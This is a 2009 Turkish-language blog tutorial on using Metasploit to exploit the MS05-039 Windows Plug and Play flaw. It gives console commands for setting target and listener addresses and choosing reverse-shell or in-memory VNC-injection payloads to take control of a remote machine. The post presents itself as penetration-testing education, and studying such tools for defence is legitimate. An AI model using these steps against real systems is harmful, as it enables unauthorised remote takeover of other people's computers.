IPHaber
Son Yazılar

Genel


Metasploit Kullanımı

Mayıs 8, 2009 by admin in Genel with 0 Comments

MSF’in kullanımını konsol ve web arayüzünü kullanarak bir örnek ile açıklamaya çalışacağız.

Bunun için öncelikle test yapacağımız sistem üzerindeki açıkları bir açık tarama yazılımı ile kullanabileceğimiz açıkları kontrol edeceğiz. Ben bunun için Nessus yazılımını kullandım. Kullandığımız tarama yazılımı ile MSF’in exploit bilgi bankasındaki değerleri karşılaştırmamız gerekiyor. Biz testlerimiz sırasında MS05-039 açığını kullanacağız. Yandaki resimde test yapacağımız sistem üzerinde Nessus’un bulduğu açığı görebilirsiniz.
Şimdi geçen sayımızda değindiğimiz komutlar yardımı ile uzak sistemin yönetimini ele geçirmeye çalışacağız. İlk olarak kullanacağımız komut sizinde hatırlayacağınız gibi MSF konsolumuzu çalıştırdıktan sonra msf > show exploit komutu. Bu komut yardımı ile ilgili exploitleri listeleyerek bizim kullanacağımız exploit’in kullanım adını bulacağız. Aşağıdaki resimler bu konuda gerekli açıklamayı verecektir.
İlgili exploit bulduktan sonra msf > use ms05_039_pnpkomutu yardımı ile Nessus kullanarak bulduğumuz exploit’i seçiyor ve ayarlarını yapmak üzere hazır hale getiriyoruz. Bu ayarlarda işletim sistemi, toplu güncelleştirme ve IP adresi gibi bilgilerimizi sisteme vererek kullanıma hazır hale getiriyoruz. Bu bilgilerin elimizde olmadığı durumlarda genel ayarlar yardımı ile de ilerleyebiliriz. Ancak sistem bilgileri birçok yazılımla elde edilebileceği ve çoğunlukla tespit ettiğimiz açıklarda bunu bize belirttiği için ince ayarları yapmak daha etkin ve kullanışlı bir yöntem.
Kullanacağımız exploit’i seçtikten sonra msf > set RHOST x.x.x.xve msf > set LHOST x.x.x.x komutları yardımı ile hedef ve kaynak sistemleri belirtiyoruz.
Hedef sistemin işletim sistemi ve SP bilgilerini biliyorsak bunu belirtiyoruz. Eğer bu bilgileri elde edemediysek genel tanımları kullanabiliriz. msf > show targets komutu yardımı ile kullanabileceğimiz seçenekleri görüyoruz ve msf > set TARGET x komutu yardımı ile seçiyoruz.
Son olarak exploit edeceğimiz sistemi nasıl yöneteceğimizi seçiyoruz. Bunun için msf > show payloads komutu ile kullanabileceğimiz yöntemleri listeletebiliriz. Burada hedef sistemin işletim sistemi ve bağlantı tipi önemli, eğer hedef sistemin bağlantısı yavaş bir bağlatıysa ve bize komut satırı yeterli olacaksa msf > set PAYLOAD win32_reverse komutunu kullanabiliriz.

Bu bize hedef sistem üzerinde bir konsol açacak ve istediğimiz komutları çalıştırmamızı sağlayacaktır. Ancak geçen sayımızda da belirttiğim gibi sistem üzerinde direkt bir kontrol işlemi bazı avantajlarda sağlayabilir. Sistemi VNC kullanarak yönetmek için  msf > set PAYLOAD win32_reverse_vncinject komutu kullanılabilir. Burada kullanılan VNC sunucusu özel olarak derlenmiş ve herhangi bir kayıt defteri değeri veya sabit disk kullanımına ihtiyaç duymadan hafızada çalışan özel bir derlemedir. Tüm bu ayarlar yapıldıktan sonra msf > exploit komutunu çalıştırarak sistemi yönetmeye başlayabiliriz. Aşağıda da ekran görüntüsünü gördüğümüz gibi sistem yönetim ekran karşımıza otomatik olarak açılacaktır.

Bu sayımızda geçen sayımızda teorik olarak anlattığımız MSF kullanımını bir örnek ile açıklamaya çalıştık. Son olarak hatırlatmak isterim ki MSF kullanımına yer verilmesinin sebebi; sadece kendi sistemlerinizi test etmeniz ve korsanların nasıl çalıştığını anlamanızdır.

Erkan Şen

Nebula Bilişim
Bilgi Güvenliği Uzmanı

Tagged ,

Related Posts

Leave a reply

E-posta hesabınız yayımlanmayacak.

Kapat